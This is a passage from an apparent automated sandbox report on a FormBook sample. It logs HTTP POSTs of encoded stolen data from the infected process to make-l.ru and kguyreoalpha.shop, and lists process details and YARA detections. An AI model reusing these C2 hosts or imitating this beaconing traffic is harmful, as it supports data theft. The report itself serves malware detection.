            May 27, 2024 19:16:10.725030899 CEST339INHTTP/1.1 302 Moved Temporarily
            Server: nginx
            Date: Mon, 27 May 2024 17:16:10 GMT
            Content-Type: text/html
            Content-Length: 154
            Connection: close
            Location: http://make-l.ru/0so0/
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.549714194.58.112.174807132C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 19:16:12.566468000 CEST781OUTPOST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.make-l.ru
            Cache-Control: no-cache
            Content-Length: 229
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.make-l.ru
            Referer: http://www.make-l.ru/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 66 57 6e 74 58 34 37 33 48 61 64 4b 4c 6d 2f 57 4f 77 44 54 44 68 4f 37 38 47 6e 59 55 5a 34 4e 4e 6b 62 58 62 55 55 6f 37 6f 42 35 43 68 32 75 6c 6a 73 67 65 71 39 64 73 70 6c 51 59 5a 69 44 39 6b 72 61 55 6c 41 79 2f 45 30 63 48 63 75 50 31 6f 6b 58 38 62 4f 68 43 50 57 4a 76 59 74 6c 48 62 78 4a 47 34 2f 4e 31 6c 63 6a 4d 76 6f 7a 65 63 35 76 51 34 59 46 76 70 6a 2b 69 6e 6b 56 46 6f 6b 7a 53 6f 63 53 51 64 35 61 47 64 36 50 65 55 7a 4b 33 44 75 37 57 35 6c 73 59 48 48 71 7a 58 51 56 4f 76 4e 38 4f 4e 42 43 71 41 6a 63 72 64 56 59 50 36 6a 74 6d 56 49 65 45 47 72 36 4f 46 43 57 42 4a 50 64 6c 4b 67 35 32 41 33 4c 32 79 71 2b 6e 4a 5a 34 6d 6e 65 32
            Data Ascii: X430XLq0=fWntX473HadKLm/WOwDTDhO78GnYUZ4NNkbXbUUo7oB5Ch2uljsgeq9dsplQYZiD9kraUlAy/E0cHcuP1okX8bOhCPWJvYtlHbxJG4/N1lcjMvozec5vQ4YFvpj+inkVFokzSocSQd5aGd6PeUzK3Du7W5lsYHHqzXQVOvN8ONBCqAjcrdVYP6jtmVIeEGr6OFCWBJPdlKg52A3L2yq+nJZ4mne2
            May 27, 2024 19:16:13.255140066 CEST339INHTTP/1.1 302 Moved Temporarily
            Server: nginx
            Date: Mon, 27 May 2024 17:16:13 GMT
            Content-Type: text/html
            Content-Length: 154
            Connection: close
            Location: http://make-l.ru/0so0/
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.549715194.58.112.174807132C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 19:16:15.388653994 CEST1798OUTPOST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.make-l.ru
            Cache-Control: no-cache
            Content-Length: 1245
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.make-l.ru
            Referer: http://www.make-l.ru/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 66 57 6e 74 58 34 37 33 48 61 64 4b 4c 6d 2f 57 4f 77 44 54 44 68 4f 37 38 47 6e 59 55 5a 34 4e 4e 6b 62 58 62 55 55 6f 37 6f 5a 35 44 54 2b 75 6c 41 45 67 45 71 39 64 6c 4a 6c 52 59 5a 69 6b 39 6b 69 53 55 6c 46 48 2f 47 4d 63 49 65 57 50 33 61 4d 58 33 62 4f 68 41 50 58 4f 68 34 74 77 48 66 73 4f 47 34 50 4e 31 6c 63 6a 4d 73 41 7a 4f 2b 42 76 57 34 59 47 71 70 6a 79 7a 33 6c 38 46 6f 63 4e 53 6f 49 43 52 72 4a 61 48 35 61 50 63 43 6e 4b 2b 44 75 75 58 35 6c 30 59 48 4c 44 7a 55 6b 5a 4f 71 77 30 4f 4b 6c 43 71 31 47 38 79 4e 4a 30 61 72 53 42 72 33 30 4c 65 52 71 57 46 58 4c 6d 65 4c 76 6b 35 4f 6f 52 38 67 62 70 37 77 33 4b 39 66 52 74 6b 51 62 6d 77 63 67 75 57 73 71 78 48 32 64 6a 46 61 36 62 41 7a 4f 52 73 57 31 41 61 4d 57 78 2f 54 6c 4f 30 42 63 32 49 4b 35 75 4b 6f 72 70 47 62 44 65 65 68 51 57 48 4e 59 4a 54 50 56 4b 47 35 6d 33 79 70 79 71 52 6f 6c 74 65 6e 36 74 6c 72 46 74 36 58 6d 2f 59 5a 2f 47 6b 73 65 78 41 6d 48 58 70 75 51 72 4a 69 31 4a 77 57 4e 4b 67 [TRUNCATED]
            Data Ascii: X430XLq0=fWntX473HadKLm/WOwDTDhO78GnYUZ4NNkbXbUUo7oZ5DT+ulAEgEq9dlJlRYZik9kiSUlFH/GMcIeWP3aMX3bOhAPXOh4twHfsOG4PN1lcjMsAzO+BvW4YGqpjyz3l8FocNSoICRrJaH5aPcCnK+DuuX5l0YHLDzUkZOqw0OKlCq1G8yNJ0arSBr30LeRqWFXLmeLvk5OoR8gbp7w3K9fRtkQbmwcguWsqxH2djFa6bAzORsW1AaMWx/TlO0Bc2IK5uKorpGbDeehQWHNYJTPVKG5m3ypyqRolten6tlrFt6Xm/YZ/GksexAmHXpuQrJi1JwWNKggt9WuxI6o9gq/a7s1bLU+2ohMcDNzPvyO4yhUFPS6Y/XFkWMtX9IpdGoIB6cr9fqQNRN+5xQN3fSq6y1oJIoCXrJmDaRG12svBsHQQA0d4Rejra4ka3Dp77kvU0hgVINyfDd8mzD+lIweHX8293oTz+apS5j7uksSEK6BkytQY1uQBDmoooHtMhBYiRtbpD9wGsOA84z3CbK7d+ny2G9FJBDywN0O/rVTTnE8lN6tIICh9jpc20qGTSw/LvS24+zLj+OCGa+wXXKO+7S4YzCk+MwKsbetzYwF2MVgCTPdtxzlSB4Gkvo6F0UtK0gyytDapG/3XAWqzgpZpFryNT+VkVIpK0rzDehe1C35Y//sEjZ3qKvcrKqHYIxdmpIhXxUitgwI+60pWHaDxQ8xVPXZHxRl/N8Tf6WtLLev/issQrWiv5Sn2oGVh98fP1pQoYuPc0eK2CCis5l2S7LrOZtaKquNrtdZBqysw1+Jp8ExyDODqaFbZ6xe269hFVu/nRp0j27NywhUCBxQ00PDfQ20dQmszKn1LespfZpWo345B6D6tLeNhekwBihb/bfKtFYrgRJb2+QzGfqZRwDqk3SVFetNwKor/3u/P1yNd4zc41fvVFscYSSa3bK2Fc3aUl0bTefOvTeFbR4mSjFIt0+mERzko3IshtEfz [TRUNCATED]
            May 27, 2024 19:16:16.096960068 CEST339INHTTP/1.1 302 Moved Temporarily
            Server: nginx
            Date: Mon, 27 May 2024 17:16:15 GMT
            Content-Type: text/html
            Content-Length: 154
            Connection: close
            Location: http://make-l.ru/0so0/
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.549716194.58.112.174807132C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 19:16:17.928508997 CEST509OUTGET /0so0/?Wd=vjk8lhT0U4&X430XLq0=SUPNUPL8X55ZGDaBFxP5SDbwzWvdce9LIUPHC0QIzt1ZKzL94hFLYJx7/4VaKoGV20qcYSFkx0JiG8qMm/Id/bOZDN/8qZd0HZpra/ntz1I1MPsqBdN1VMBNg4zQsHhwAw== HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.make-l.ru
            Connection: close
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            May 27, 2024 19:16:18.629443884 CEST495INHTTP/1.1 302 Moved Temporarily
            Server: nginx
            Date: Mon, 27 May 2024 17:16:18 GMT
            Content-Type: text/html
            Content-Length: 154
            Connection: close
            Location: http://make-l.ru/0so0/?Wd=vjk8lhT0U4&X430XLq0=SUPNUPL8X55ZGDaBFxP5SDbwzWvdce9LIUPHC0QIzt1ZKzL94hFLYJx7/4VaKoGV20qcYSFkx0JiG8qMm/Id/bOZDN/8qZd0HZpra/ntz1I1MPsqBdN1VMBNg4zQsHhwAw==
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.54971743.132.225.97807132C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 19:16:24.039251089 CEST785OUTPOST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.kguyreoalpha.shop
            Cache-Control: no-cache
            Content-Length: 209
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.kguyreoalpha.shop
            Referer: http://www.kguyreoalpha.shop/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 55 56 45 53 70 59 75 41 4d 66 4e 45 66 36 2b 35 35 59 6e 73 34 75 77 75 76 34 77 42 48 49 30 56 70 66 41 44 76 51 68 73 63 2b 43 4a 42 72 53 58 65 52 78 35 55 79 4c 42 44 70 50 4a 57 47 55 47 73 69 4d 52 54 76 58 48 4b 78 78 55 4f 4e 65 42 78 65 57 57 64 45 66 63 4f 49 66 6e 51 2f 6d 57 6a 42 4c 67 32 64 6f 66 53 49 38 4d 4d 43 43 54 41 41 58 6b 63 79 79 50 64 61 68 57 58 47 73 2b 6c 35 69 31 6a 47 31 48 76 38 67 69 38 70 50 36 75 61 6c 6e 6e 36 62 2b 43 79 71 6f 46 59 4b 66 71 48 77 77 4e 32 51 54 48 79 57 67 6f 43 47 6b 69 38 6c 6c 30 30 43 75 32 54 35 58 5a 71 70 30 35 30 79 35 70 68 6f 3d
            Data Ascii: X430XLq0=UVESpYuAMfNEf6+55Yns4uwuv4wBHI0VpfADvQhsc+CJBrSXeRx5UyLBDpPJWGUGsiMRTvXHKxxUONeBxeWWdEfcOIfnQ/mWjBLg2dofSI8MMCCTAAXkcyyPdahWXGs+l5i1jG1Hv8gi8pP6ualnn6b+CyqoFYKfqHwwN2QTHyWgoCGki8ll00Cu2T5XZqp050y5pho=


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.54971843.132.225.97807132C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 19:16:26.567429066 CEST805OUTPOST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.kguyreoalpha.shop
            Cache-Control: no-cache
            Content-Length: 229
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.kguyreoalpha.shop
            Referer: http://www.kguyreoalpha.shop/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 55 56 45 53 70 59 75 41 4d 66 4e 45 65 5a 32 35 37 2f 54 73 77 75 77 74 71 34 77 42 53 59 30 5a 70 66 4d 44 76 56 4e 43 63 4c 53 4a 45 37 69 58 66 56 6c 35 58 79 4c 42 62 35 50 4d 4a 57 55 64 73 69 4a 69 54 74 54 48 4b 78 56 55 4f 4a 53 42 78 76 57 52 63 55 66 65 62 59 66 68 65 66 6d 57 6a 42 4c 67 32 64 73 31 53 49 45 4d 4d 79 79 54 48 52 58 37 52 53 79 4d 55 36 68 57 64 6d 73 36 6c 35 6a 57 6a 43 31 70 76 2b 6f 69 38 6f 2f 36 76 49 64 6f 2b 4b 62 30 4d 53 72 66 4e 73 54 37 73 56 34 6d 47 48 68 41 52 56 79 70 67 55 72 4f 34 65 74 4e 6e 55 75 57 6d 41 78 67 49 61 49 64 6a 58 69 4a 33 32 38 49 62 6b 6e 77 51 32 56 45 32 44 66 68 66 31 31 49 44 33 65 35
            Data Ascii: X430XLq0=UVESpYuAMfNEeZ257/Tswuwtq4wBSY0ZpfMDvVNCcLSJE7iXfVl5XyLBb5PMJWUdsiJiTtTHKxVUOJSBxvWRcUfebYfhefmWjBLg2ds1SIEMMyyTHRX7RSyMU6hWdms6l5jWjC1pv+oi8o/6vIdo+Kb0MSrfNsT7sV4mGHhARVypgUrO4etNnUuWmAxgIaIdjXiJ328IbknwQ2VE2Dfhf11ID3e5


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.54971943.132.225.97807132C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 19:16:29.098670959 CEST1822OUTPOST /0so0/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.kguyreoalpha.shop
            Cache-Control: no-cache
            Content-Length: 1245
            Content-Type: application/x-www-form-urlencoded
            Connection: close
            Origin: http://www.kguyreoalpha.shop
            Referer: http://www.kguyreoalpha.shop/0so0/
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Data Raw: 58 34 33 30 58 4c 71 30 3d 55 56 45 53 70 59 75 41 4d 66 4e 45 65 5a 32 35 37 2f 54 73 77 75 77 74 71 34 77 42 53 59 30 5a 70 66 4d 44 76 56 4e 43 63 4c 61 4a 45 6f 71 58 65 30 6c 35 57 79 4c 42 46 70 50 4e 4a 57 55 51 73 69 78 75 54 74 66 39 4b 7a 64 55 50 73 4f 42 33 63 4f 52 56 55 66 65 5a 59 66 67 51 2f 6d 48 6a 41 37 6b 32 63 63 31 53 49 45 4d 4d 78 71 54 52 51 58 37 54 53 79 50 64 61 68 73 58 47 73 43 6c 35 71 74 6a 43 35 58 75 4f 49 69 38 49 76 36 73 39 4a 6f 68 36 62 36 4c 53 72 48 4e 70 4c 6b 73 52 67 71 47 48 6b 62 52 54 43 70 6a 43 6d 70 38 75 68 56 2b 57 4f 41 6b 77 68 4d 4a 2f 4e 77 74 30 69 49 32 6c 6c 79 66 51 2f 54 57 42 39 6c 32 69 75 66 64 69 4a 6b 41 79 4f 34 32 31 30 68 4d 4a 76 6b 43 71 76 54 33 63 48 4d 56 59 30 63 50 59 7a 71 51 52 70 56 52 38 73 4d 49 67 79 69 58 6a 35 77 34 61 50 45 6b 43 31 56 58 67 47 38 6d 37 71 38 34 65 41 49 79 4b 78 38 4c 2f 73 65 47 59 73 58 31 66 56 70 41 4b 79 6d 50 54 67 78 74 51 72 59 2f 30 44 36 69 32 47 76 2f 52 45 58 66 6f 32 31 46 32 32 51 41 [TRUNCATED]
            Data Ascii: X430XLq0=UVESpYuAMfNEeZ257/Tswuwtq4wBSY0ZpfMDvVNCcLaJEoqXe0l5WyLBFpPNJWUQsixuTtf9KzdUPsOB3cORVUfeZYfgQ/mHjA7k2cc1SIEMMxqTRQX7TSyPdahsXGsCl5qtjC5XuOIi8Iv6s9Joh6b6LSrHNpLksRgqGHkbRTCpjCmp8uhV+WOAkwhMJ/Nwt0iI2llyfQ/TWB9l2iufdiJkAyO4210hMJvkCqvT3cHMVY0cPYzqQRpVR8sMIgyiXj5w4aPEkC1VXgG8m7q84eAIyKx8L/seGYsX1fVpAKymPTgxtQrY/0D6i2Gv/REXfo21F22QAk7+R/0NTEoGQ7o43k0p6hjuBNE1EQILtVGGkrgDh/2YRFhFgsstVIe0VwGv+y/5P6pb8e42Jd19D5jZcoiVEJQshfzSYevvAa2Tltd4R16I8dzXZVoup0goA6pcip0HCf0TCO91sd70/BWFfLs6EZ3oNQGJSwCG/swhP36jyZyq6LbIMLlxGJPvnf4Qo2g82711BaFgCXmQiCj/y716Qc9y/oNzWwHRk0BFdC1R/6Rpzz1kRS4uagPbAmHeKOVF8EvtPjI8RU/Clxx1ei28S68A+876wiBKd9/hWSJ8rCYRruQ7rIkc1sHVuZhOnLLGnfXKQle1uy8fcJmKVVvhTqzARhN8qNEe2O4wAQQ+nTJonVVZbi9g98PnGsO/IX1gugnK0YIjLY9sTHa/XAJvCbaoEZpZbffAY6ySP0uHWgROLrBkLM1OYaUerTCqP4msU/2MlNQG73WQF1v9najaoRoHgD+YCe1ZWnoC+qgELOPKo75zoT8+L4I6zN6bFIBELnCufyuKq2PqA9YxlLit+SZ2ghmavInR0VCHgo2uCNuXNLQJ6pMNsFCqRY7ELz2PYY1uumBzLiquUhQZDH/RuZJupWS4viZ++wFraGhhlQLjmmSsDlrB3qmH2FmC5TNskMeMS6ioxTPY8E2Smwp3OCy2W6+Fax8Ktsq [TRUNCATED]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.54972043.132.225.97807132C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            TimestampBytes transferredDirectionData
            May 27, 2024 19:16:32.483493090 CEST517OUTGET /0so0/?X430XLq0=ZXsyqv6OWO1jdfmZwPHK8dAntN05Z+dsmugw9BJBTbqyaa2WOVN+U2naZpjsCmE4tUAeXtTgCCsmM8Dup6ejRXHoa4TAR4CFgRPYrdUpMYgqMRztZg/3Zk7YYa9ZW1B17w==&Wd=vjk8lhT0U4 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.kguyreoalpha.shop
            Connection: close
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:13:14:50
            Start date:27/05/2024
            Path:C:\Users\user\Desktop\F2024-202202.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\F2024-202202.exe"
            Imagebase:0x180000
            File size:1'165'312 bytes
            MD5 hash:0E7042C3256BA6A60BEE8CF70A18958C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            General

            Target ID:2
            Start time:13:14:51
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\svchost.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\F2024-202202.exe"
            Imagebase:0x6c0000
            File size:46'504 bytes
            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:true

            General

            Target ID:4
            Start time:13:15:16
            Start date:27/05/2024
            Path:C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe"
            Imagebase:0x100000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            General

            Target ID:5
            Start time:13:15:18
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\openfiles.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\SysWOW64\openfiles.exe"
            Imagebase:0x630000
            File size:60'416 bytes
            MD5 hash:50BD10A4C573E609A401114488299D3D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:false

            General

            Target ID:6
            Start time:13:15:31
            Start date:27/05/2024
            Path:C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe"
            Imagebase:0x100000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            General

            Target ID:9
            Start time:13:15:48
            Start date:27/05/2024
            Path:C:\Program Files\Mozilla Firefox\firefox.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
            Imagebase:0x7ff79f9e0000
            File size:676'768 bytes
            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:3.9%
              Dynamic/Decrypted Code Coverage:1.5%
              Signature Coverage:3.6%
